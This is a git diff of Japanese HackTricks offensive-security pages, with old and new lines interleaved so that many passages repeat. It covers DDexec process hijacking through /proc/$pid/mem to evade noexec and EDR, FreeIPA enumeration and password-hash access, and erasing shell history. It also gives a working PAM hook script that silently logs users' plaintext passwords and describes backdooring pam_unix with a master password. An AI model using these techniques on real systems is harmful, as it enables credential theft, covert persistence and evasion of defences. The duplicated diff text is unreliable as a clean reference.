- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **ハッキングトリックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリに。
</details>
## コンテキスト
Linuxでは、プログラムを実行するためには、ファイルとして存在する必要があり、ファイルシステム階層を通じていかなる方法でもアクセスできる必要があります(これは単に `execve()` が動作する方法です。このファイルはディスク上にあるか、ramtmpfs、memfdにあるかもしれませんが、ファイルパスが必要です。これにより、Linuxシステムで実行されるものを制御することが非常に簡単になり、脅威や攻撃者のツールを検出したり、それらが自分たちのものを実行しようとするのを防止したりすることが簡単になります(たとえば、特権のないユーザーが実行可能ファイルをどこにでも配置することを許可しない)。
Linuxでは、プログラムを実行するためには、ファイルとして存在する必要があり、ファイルシステム階層を通じていかなる方法でもアクセス可能である必要があります(これは`execve()`が動作する方法です。このファイルはディスク上にあるか、ramtmpfs、memfdにあるかもしれませんが、ファイルパスが必要です。これにより、Linuxシステムで実行されるものを制御することが非常に簡単になり、脅威や攻撃者のツールを検出したり、それらが自分のものを実行しようとするのを防止したりすることが簡単になりますたとえば、特権のないユーザーが実行可能ファイルをどこにでも配置することを許可しない
しかし、このテクニックはすべてを変えるためにここにあります。**希望のプロセスを開始できない場合は... すでに存在するプロセスを乗っ取ります**。
しかし、このテクニックはすべてを変えるためにここにあります。あなたが望むプロセスを開始できない場合は... **すでに存在するプロセスを乗っ取ります**
このテクニックにより、**読み取り専用、noexec、ファイル名のホワイトリスト、ハッシュのホワイトリストなどの一般的な保護技術をバイパス**できます。
@ -40,19 +40,19 @@ base64
```
## テクニック
プロセスのメモリを任意に変更できる場合、そのプロセスを乗っ取ることができます。これは既存のプロセスを乗っ取り、別のプログラムで置き換えるために使用できます。これは、`ptrace()` シスコールを使用するか(これにはシスコールを実行する権限が必要またはシステムに gdb が利用可能である必要があります)、またはより興味深い方法として `/proc/$pid/mem` に書き込むことで達成できます。
プロセスのメモリを任意に変更できる場合、そのプロセスを乗っ取ることができます。これは既存のプロセスを乗っ取り、別のプログラムで置き換えるために使用できます。これは、`ptrace()` シスコールを使用するか(`/proc/$pid/mem` に書き込むことで達成できます。
ファイル `/proc/$pid/mem` はプロセスのアドレス空間全体の1対1のマッピングです例: x86-64 では `0x0000000000000000` から `0x7ffffffffffff000` まで)。これは、オフセット `x` でこのファイルから読み取りまたは書き込みを行うことは、仮想アドレス `x` の内容を読み取るか変更することと同じです。
ファイル `/proc/$pid/mem` はプロセスのアドレス空間全体の1対1のマッピングです例: x86-64 では `0x0000000000000000` から `0x7ffffffffffff000` まで)。つまり、オフセット `x` でこのファイルから読み取るか書き込むことは、仮想アドレス `x` の内容を読み取るか変更することと同じです。
さて、私たちが直面する基本的な問題は4つあります:
さて、解決すべき基本的な4つの問題があります:
* 一般的に、ルートとファイルのプログラム所有者のみが変更できます。
* 一般的に、ルートとファイルの所有者のみが変更できます。
* ASLR。
* プログラムのアドレス空間にマップされていないアドレスに読み取りまたは書き込みを試みると、I/O エラーが発生します。
これらの問題には、完璧ではないが良い解決策があります:
* ほとんどのシェルインタプリタは、子プロセスで継承されるファイルディスクリプタを作成することを許可します。私たちは、`mem` ファイルへの書き込み権限を持つ fd を作成できます... その fd を使用する子プロセスはシェルのメモリを変更できるようになります。
* ほとんどのシェルインタプリタは、子プロセスで継承されるファイルディスクリプタの作成を許可します。書き込み権限を持つ `mem` ファイルを指す fd を作成できます... その fd を使用する子プロセスはシェルのメモリを変更できます。
* ASLR は問題ではありません。プロセスのアドレス空間に関する情報を得るために、シェルの `maps` ファイルや procfs の他のファイルをチェックできます。
* したがって、ファイル上で `lseek()` を行う必要があります。シェルからは、悪名高い `dd` を使用しない限り、これはできません。
@ -60,48 +60,51 @@ base64
手順は比較的簡単であり、理解するために専門知識は必要ありません:
* 実行したいバイナリとローダーを解析し、必要なマッピングを見つけます。その後、`execve()` の各呼び出しでカーネルが行う手順と大まかに同じ手順を実行する "シェル"コードを作成します:
* 実行したいバイナリとローダーを解析し、必要なマッピングを見つけます。その後、`execve()` の各呼び出しでカーネルが行う手順と大まかに同じ手順を実行する "シェル"コードを作成します:
* これらのマッピングを作成します。
* バイナリをそれらに読み込みます。
* バイナリを読み込みます。
* 権限を設定します。
* 最後に、プログラムの引数でスタックを初期化し、ローダーが必要とする補助ベクトルを配置します。
* プログラムの引数でスタックを初期化し、ローダーが必要とする補助ベクトルを配置します。
* ローダーにジャンプし、残りの処理をさせます(プログラムが必要とするライブラリをロードします)。
* 実行中のプロセスが実行後に戻るアドレスを `syscall` ファイルから取得します。
* その場所(実行可能な場所)を私たちのシェルコードで上書きします(`mem` を介して書き込み不可のページを変更できます)
* 実行したいプログラムをプロセスの stdin に渡します("シェル"コードによって `read()` されます)。
* この時点で、プログラムをロードするために必要なライブラリをロードし、それにジャンプするかどうかはローダー次第です。
* 実行中のシスコール後にプロセスが戻るアドレスを `syscall` ファイルから取得します。
* その場所を上書きし、実行可能な状態になる場所に、`mem` を介して書き込むことができるシェルコードを配置します
* 実行したいプログラムをプロセスの stdin に渡します(この "シェル"コードによって `read()` されます)。
* この時点で、プログラム必要なライブラリをロードし、それにジャンプするかどうかはローダー次第です。
**ツールを確認する** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec)
## EverythingExec
2022年12月12日現在、`dd` の代替手段をいくつか見つけました。そのうちの1つである `tail` は、現在 `mem` ファイルを `lseek()` するために使用されているデフォルトプログラムです(`dd` を使用する唯一の目的でした)。これらの代替手段は次のとおりです:
`dd` にはいくつかの代替手段がありますが、そのうちの1つである `tail` は現在、`mem` ファイルを `lseek()` するためにデフォルトで使用されています(これは `dd` を使用する唯一の目的でした)。これらの代替手段は次のとおりです:
```bash
tail
hexdump
cmp
xxd
```
変数`SEEKER`を設定すると、使用するシーカーを変更できます。 例:
変数`SEEKER`を設定すると、使用するシーカーを変更できます。例:
```bash
SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
```
しスクリプトに実装されていない別の有効なシーカーを見つけた場合は、`SEEKER_ARGS`変数を設定して使用することができます:
う1つの有効なシーカーがスクリプトに実装されていない場合は、`SEEKER_ARGS`変数を設定して使用することができます:
```bash
SEEKER=xxd SEEKER_ARGS='-s $offset' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
```
ブロックする、EDRs。
ブロックするんだ、EDR。
# 参考文献
* [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec)
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する。
* **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出することで**
</details>

44
linux-hardening/freeipa-pentesting.md
View file

@ -9,21 +9,21 @@ HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝**したい場合や **HackTricks をPDFでダウンロード**したい場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つける
* **💬 [Discord グループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegram グループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@hacktricks_live** をフォローする
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) の GitHub リポジトリに PR を提出する
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で **@hacktricks_live** をフォローする
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>
## 基本情報
FreeIPA は、Microsoft Windows **Active** **Directory** のオープンソース **代替** として提示され、統合管理のために主に **Unix** 環境で利用されています。これには、Active Directory に類似した MIT **Kerberos** Key Distribution Center によってバックアップされた完全な **LDAP ディレクトリ** が備わっています。Dogtag **Certificate System** は CA & RA 証明書の管理に使用され、スマートカードを含む **マルチファクタ**認証機能を可能にします。Unix 認証プロセスへの統合には、SSSD が使用されています。
FreeIPA は、主に Unix 環境向けの Microsoft Windows Active Directory のオープンソース **代替** です。これは、Active Directory に似た管理のための MIT Kerberos Key Distribution Center と完全な LDAP ディレクトリを組み合わせています。CARA 証明書管理のために Dogtag Certificate System を利用し、スマートカードを含む **マルチファクタ** 認証をサポートしています。Unix 認証プロセスには SSSD が統合されています。
## フィンガープリント
### ファイルと環境変数
- `/etc/krb5.conf` にあるファイルには、ドメインへの登録に必要な Kerberos クライアント情報が格納されています。これには、KDC および管理サーバーの場所、デフォルト設定、およびマッピングが含まれます。
- IPA クライアントおよびサーバーのシステム全体のデフォルト設定は、`/etc/ipa/default.conf` に配置されています。
- `/etc/krb5.conf` にあるファイルには、ドメインへの登録に必要な Kerberos クライアント情報が格納されています。これには KDC や管理サーバーの場所、デフォルト設定、マッピングが含まれます。
- IPA クライアントサーバーのシステム全体のデフォルト設定は、`/etc/ipa/default.conf` に配置されています。
- ドメイン内のホストは、認証プロセスに `/etc/krb5.keytab` にある `krb5.keytab` ファイルを持っている必要があります。
- 様々な環境変数(`KRB5CCNAME`、`KRB5_KTNAME`、`KRB5_CONFIG`、`KRB5_KDC_PROFILE`、`KRB5RCACHETYPE`、`KRB5RCACHEDIR`、`KRB5_TRACE`、`KRB5_CLIENT_KTNAME`、`KPROP_PORT`が、Kerberos 認証に関連する特定のファイルや設定を指すために使用されます。
@ -41,19 +41,19 @@ FreeIPA における **Kerberos** を利用した認証は、**Active Directory*
### **CCACHE チケットファイル**
通常は **`/tmp`** に **600** の権限で保存される CCACHE ファイルは、Kerberos 資格情報を保存するためのバイナリ形式であり、ユーザーの平文パスワードなしでの認証に重要です。CCACHE チケットの解析は `klist` コマンドを使用して行い、有効な CCACHE チケットを再利用するには、`KRB5CCNAME` をチケットファイルのパスにエクスポートする必要があります。
通常は **`/tmp`** に **600** の権限で保存される CCACHE ファイルは、Kerberos 資格情報を保存するためのバイナリ形式であり、ポータビリティがあるため、ユーザーの平文パスワードなしでの認証に重要です。CCACHE チケットの解析は `klist` コマンドを使用して行い、有効な CCACHE チケットを再利用するには、`KRB5CCNAME` をチケットファイルのパスにエクスポートする必要があります。
### **Unix キーリング**
代わりに、CCACHE チケットは Linux キーリングに保存することができ、チケットの管理についてより多くの制御を提供します。チケットの保存範囲は異なります(`KEYRING:name`、`KEYRING:process:name`、`KEYRING:thread:name`、`KEYRING:session:name`、`KEYRING:persistent:uidnumber`)、`klist` はこの情報をユーザーに対して解析することができます。ただし、Unix キーリングから CCACHE チケットを再利用することは課題があり、**Tickey** のようなツールが Kerberos チケットを抽出するために利用できます。
代わりに、CCACHE チケットを Linux キーリングに保存することもでき、チケットの管理により多くの制御が可能です。チケットの保存範囲は異なります(`KEYRING:name`、`KEYRING:process:name`、`KEYRING:thread:name`、`KEYRING:session:name`、`KEYRING:persistent:uidnumber`)、ユーザー向けにこの情報を解析するために `klist` を使用できます。ただし、Unix キーリングから CCACHE チケットを再利用することは課題があり、**Tickey** のようなツールが利用可能です。
### Keytab
Kerberos プリンシパルと暗号化キーを含む Keytab ファイルは、プリンシパルのパスワードを必要とせずに有効なチケット発行チケットTGTを取得するために重要です。Keytab ファイルからの資格情報の解析と再利用は、`klist` のようなユーティリティや **KeytabParser**ようなスクリプトを使用して簡単に実行できます。
Kerberos プリンシパルと暗号化キーを含む Keytab ファイルは、プリンシパルのパスワードを必要とせずに有効なチケット発行チケットTGTを取得するために重要です。Keytab ファイルからの資格情報の解析と再利用は、`klist` のようなユーティリティや **KeytabParser** などのスクリプトを使用して簡単に実行できます。
### チートシート
Linux でチケットを使用する方法に関する詳細情報は、以下のリンクで見つけることができます:
Linux でチケットを使用する方法に関する詳細情報は、のリンクで見つけることができます:
{% content-ref url="privilege-escalation/linux-active-directory.md" %}
[linux-active-directory.md](privilege-escalation/linux-active-directory.md)
@ -62,14 +62,14 @@ Linux でチケットを使用する方法に関する詳細情報は、以下
## 列挙
{% hint style="warning" %}
**ldap** や他の **バイナリ** ツールを使用したり、FreeIPA サーバーのポート 443 のウェブページに **接続** することで **列挙** を実行できます。
**ldap** や他の **バイナリ** ツールを使用した **列挙**、または FreeIPA サーバーのポート 443 に **接続する**ことによって **列挙** を実行できます。
{% endhint %}
### ホスト、ユーザー、およびグループ <a href="#4b3b" id="4b3b"></a>
**ホスト**、**ユーザー**、および **グループ** を作成することが可能です。ホストとユーザーはそれぞれ “**ホストグループ**” と “**ユーザーグループ**” と呼ばれるコンテナに分類されます。これらは **組織単位**OUに類似しています。
**ホスト**、**ユーザー**、および **グループ** を作成することが可能です。ホストとユーザーはそれぞれ「**ホストグループ**」と「**ユーザーグループ**」と呼ばれるコンテナに分類されます。これらは **組織単位**OUに類似しています。
デフォルトでは、FreeIPA では LDAP サーバーが **匿名バインド** を許可し、多くのデータが **未認証**列挙可能です。これにより、未認証で利用可能なすべてのデータを列挙できます。
FreeIPA では、LDAP サーバーは **匿名バインド** を許可しており、**未認証** で多くのデータが列挙可能です。これにより、未認証で利用可能なすべてのデータを列挙できます。
```
ldapsearch -x
```
@ -110,7 +110,7 @@ ipa hostgroup-show <host group> --all
**IPAサーバー**の**root**ユーザーはパスワード**ハッシュ**にアクセスできます。
- ユーザーのパスワードハッシュは、「**userPassword**」**属性**に**base64**で保存されます。このハッシュは**SSHA512**古いFreeIPAのバージョンまたは**PBKDF2\_SHA256**である可能性があります。
- パスワードの**Nthash**は、「ipaNTHash」に**base64**で保存されます。システムが**AD**と**統合**されている場合。
- パスワードの**Nthash**は、「**ipaNTHash**」に**base64**で保存されます。システムが**AD**と**統合**されている場合。
これらのハッシュをクラックするには:
@ -148,17 +148,17 @@ ipa sudorule-find
# Show info of rule
ipa sudorule-show <sudorule> --all
```
### ロールベースアクセス制御
### ロールベースアクセス制御
**ロール**はさまざまな**特権**で構成され、それぞれが一連の**権限**を含んでいます。これらのロールは、ユーザー、ユーザー**グループ**、**ホスト**、ホストグループ、およびサービスに割り当てることができます。たとえば、この構造を示すために、FreeIPAのデフォルトの「ユーザー管理者」ロールを考えてみましょう。
ロール`ユーザー管理者`には、以下の特権があります:
`ユーザー管理者`ロールには、次の特権があります:
- **ユーザー管理者**
- **グループ管理者**
- **ステージユーザー管理者**
以下のコマンドを使用すると、ロール、特権、および権限を列挙することができます:
次のコマンドを使用して、ロール、特権、および権限を列挙することができます:
```bash
# Using ldap
ldapsearch -Y gssapi -b "cn=roles,cn=accounts,dc=westeros,dc=local"
@ -184,7 +184,7 @@ ipa permission-show <permission> --all
### ~~rootユーザーの作成~~
{% hint style="warning" %}
新しいユーザーを`root`という名前で作成できる場合、そのユーザーに成りすまして、**任意のマシンにrootとしてSSHできます。**
新しいユーザーを `root` という名前で作成できる場合、そのユーザーになりすまして **任意のマシンにSSHでrootとしてアクセス** できます。
**これはパッチ済みです。**
{% endhint %}
@ -199,14 +199,14 @@ ipa permission-show <permission> --all
<details>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝したい**、または **HackTricksをPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけ
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) をフォローする
* ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
</details>

40
linux-hardening/linux-environment-variables.md
View file

@ -8,9 +8,9 @@ HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する。
- **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
- **ハッキングトリックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する。**
</details>
@ -18,7 +18,7 @@ HackTricksをサポートする他の方法
グローバル変数は**子プロセス**によって**継承されます**。
現在のセッション用にグローバル変数を作成することができます。
現在のセッションにグローバル変数を作成するには、次のようにします:
```bash
export MYGLOBAL="hello world"
echo $MYGLOBAL #Prints: hello world
@ -45,28 +45,12 @@ printenv
cat /proc/$$/environ
cat /proc/`python -c "import os; print(os.getppid())"`/environ
```
## 永続的な環境変数
#### **すべてのユーザーの動作に影響を与えるファイル:**
* _**/etc/bash.bashrc**_: このファイルは対話型シェル(通常のターミナル)が起動されるたびに読み込まれ、ここに指定されたすべてのコマンドが実行されます。
* _**/etc/profile および /etc/profile.d/\***_**:** このファイルはユーザーがログインするたびに読み込まれます。したがって、ここで実行されるすべてのコマンドは、ユーザーがログインする際に1度だけ実行されます。
* \*\*例: \*\*
`/etc/profile.d/somescript.sh`
```bash
#!/bin/bash
TEST=$(cat /var/somefile)
export $TEST
```
## 一般的な変数
From: [https://geek-university.com/linux/common-environment-variables/](https://geek-university.com/linux/common-environment-variables/)
* **DISPLAY** **X** が使用するディスプレイ。通常、この変数は **:0.0** に設定されます。これは現在のコンピューター上の最初のディスプレイを意味します。
* **EDITOR** ユーザーの選択したテキストエディタ。
* **EDITOR** ユーザーの選択したテキストエディター。
* **HISTFILESIZE** 履歴ファイルに含まれる最大行数。
* **HISTSIZE** ユーザーがセッションを終了するときに履歴ファイルに追加される行数。
* **HOME** ホームディレクトリ。
@ -76,18 +60,18 @@ From: [https://geek-university.com/linux/common-environment-variables/](https://
* **MANPATH** マニュアルページを検索するディレクトリのリスト。
* **OSTYPE** オペレーティングシステムのタイプ。
* **PS1** bash のデフォルトプロンプト。
* **PATH** 実行したいバイナリファイルを保持するすべてのディレクトリのパス。ファイル名を指定するだけで相対パスや絶対パスを使用せずに実行できます。
* **PATH** 実行したいバイナリファイルを保持するすべてのディレクトリのパス。ファイル名を指定するだけで相対パスや絶対パスを指定せずに実行できます。
* **PWD** 現在の作業ディレクトリ。
* **SHELL** 現在のコマンドシェルへのパス(例: **/bin/bash**
* **TERM** 現在の端末タイプ(例: **xterm**
* **TZ** 時間帯
* **SHELL** 現在のコマンドシェルへのパス (例: **/bin/bash**)
* **TERM** 現在の端末タイプ (例: **xterm**)
* **TZ** 自分のタイムゾーン
* **USER** 現在のユーザー名。
## ハッキングに興味深い変数
## ハッキングに関連する興味深い変数
### **HISTFILESIZE**
この変数の **値を 0 に変更** して、セッションを **終了** するときに **履歴ファイル**\~/.bash\_history**削除される** ようにします
この変数の **値を 0 に変更** してください。これにより、セッションを **終了** するときに **履歴ファイル** (\~/.bash\_history) **が削除されます**
```bash
export HISTFILESIZE=0
```
@ -99,12 +83,12 @@ export HISTSIZE=0
```
### http\_proxy & https\_proxy
プロセスは、ここで宣言された **proxy** を使用して、**httpまたはhttps** を介してインターネットに接続します。
プロセスは、ここで宣言された **プロキシ** を使用して、**httpまたはhttps** を介してインターネットに接続します。
```bash
export http_proxy="http://10.10.10.10:8080"
export https_proxy="http://10.10.10.10:8080"
```
### SSL\_CERT\_FILE & SSL\_CERT\_DIR
### SSL_CERT_FILE & SSL_CERT_DIR
プロセスは、**これらの環境変数**で指定された証明書を信頼します。
```bash

112
linux-hardening/linux-post-exploitation/README.md
View file

@ -2,15 +2,15 @@
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>を学ぶ</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学びましょう</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**したり、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォロー**する
- **ハッキングテクニックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出**してください。
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
- **ハッキングトリックを共有するには、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください**
</details>
@ -22,98 +22,42 @@ PAMモジュールを構成して、各ユーザーがログインに使用す
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
{% endcontent-ref %}
まず、新しい認証が発生するたびに呼び出されるbashスクリプトを作成します。
**詳細については、[元の投稿](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)を確認してください**。これは要約です:
**技術概要:**
プラガブル認証モジュールPAMは、Unixベースのシステムで認証を管理する柔軟性を提供します。これにより、ログインプロセスをカスタマイズしてセキュリティを向上させることができますが、誤用されるとリスクが生じる可能性もあります。この要約では、PAMを使用してログイン資格情報をキャプチャする技術と、緩和策について概説しています。
**資格情報のキャプチャ:**
- `toomanysecrets.sh`という名前のbashスクリプトが作成され、ログイン試行を記録し、日付、ユーザー名`$PAM_USER`、パスワードstdin経由、およびリモートホストIP`$PAM_RHOST`)を`/var/log/toomanysecrets.log`にキャプチャします。
- スクリプトは実行可能になり、`pam_exec.so`モジュールを使用してPAM構成`common-auth`)に統合され、静かに実行され、認証トークンがスクリプトに公開されるオプションが付けられます。
- この手法は、侵害されたLinuxホストが悪用されて資格情報を控えめに記録する方法を示しています。
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
```
変数はPAM固有であり、`pam_exec.so`モジュールを介して利用可能になります。
以下は変数の意味です:
- **$PAM\_USER:** 入力されたユーザー名。
- **$PAM\_RHOST:** リモートホスト通常はIPアドレス
- **$(cat -):** これは`stdin`を読み取り、スクリプトが取得するパスワードが含まれます。
- 結果は`/var/log/toomanysecrets.log`にログファイルにパイプされます。
**すべてのユーザーがファイルを読めないようにする**には、事前に作成して`chmod`を実行することを検討してください。
```bash
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
```
次に、PAM構成ファイルを更新する必要があります。`pam_exec`モジュールを使用してスクリプトを呼び出します。
`/etc/pam.d/`にはさまざまな構成ファイルがあり、`common-auth`を選択します。
```
sudo nano /etc/pam.d/common-auth
```
ファイルの最下部に、以下の認証モジュールを追加してください:
`auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh`
オプションの意味は次の通りです:
- **optional:** エラーが発生しても認証が失敗しない(必須ステップではない)
- **pam\_exec.so:** 任意のスクリプトを呼び出すことができる PAM モジュール
- **expose\_authtok:** `stdin` を介してパスワードを読み取るトリック
- **quiet:** ユーザーにエラーを表示しない(何かがうまくいかない場合)
- 最後の引数は以前に作成したシェルスクリプトです
![](<../../.gitbook/assets/image (375).png>)
最後に、ファイルを実行可能にします:
`sudo chmod 700 /usr/local/bin/toomanysecrets.sh`
これで、別のマシンから ssh したり、ローカルでログインしたりしてみてください。
そして、ログファイルを確認してください:
```
$ sudo cat /var/log/toomanysecrets.log
Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
```
### PAMへのバックドア設置
PAMのソースコードに移動しますディストリビューションによって異なりますが、自分のバージョンと同じものを使用してください。そして、pam_unix_auth.cファイルの170/180行付近を調べてみましょう
```
vi modules/pam_unix/pam_unix_auth.c
```
![](<../../.gitbook/assets/image (651).png>)
**詳細については、[元の投稿](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)を参照してください**。以下は要約です:
これを以下のように変更します:
Pluggable Authentication ModulePAMは、Linuxでユーザー認証に使用されるシステムです。**ユーザー名**、**パスワード**、**サービス**の3つの主要な概念に基づいて動作します。各サービスの構成ファイルは`/etc/pam.d/`ディレクトリにあり、共有ライブラリが認証を処理します。
![](<../../.gitbook/assets/image (638) (2) (2).png>)
**目的**: PAMを変更して、特定のパスワードで認証を許可し、実際のユーザーパスワードをバイパスします。特に、ほとんどのサービスでパスワードの検証に使用される`common-auth`ファイルで使用される`pam_unix.so`共有ライブラリに焦点を当てています。
これにより、**パスワード "0xMitsurugi"** を使用するユーザーがログインできるようになります。
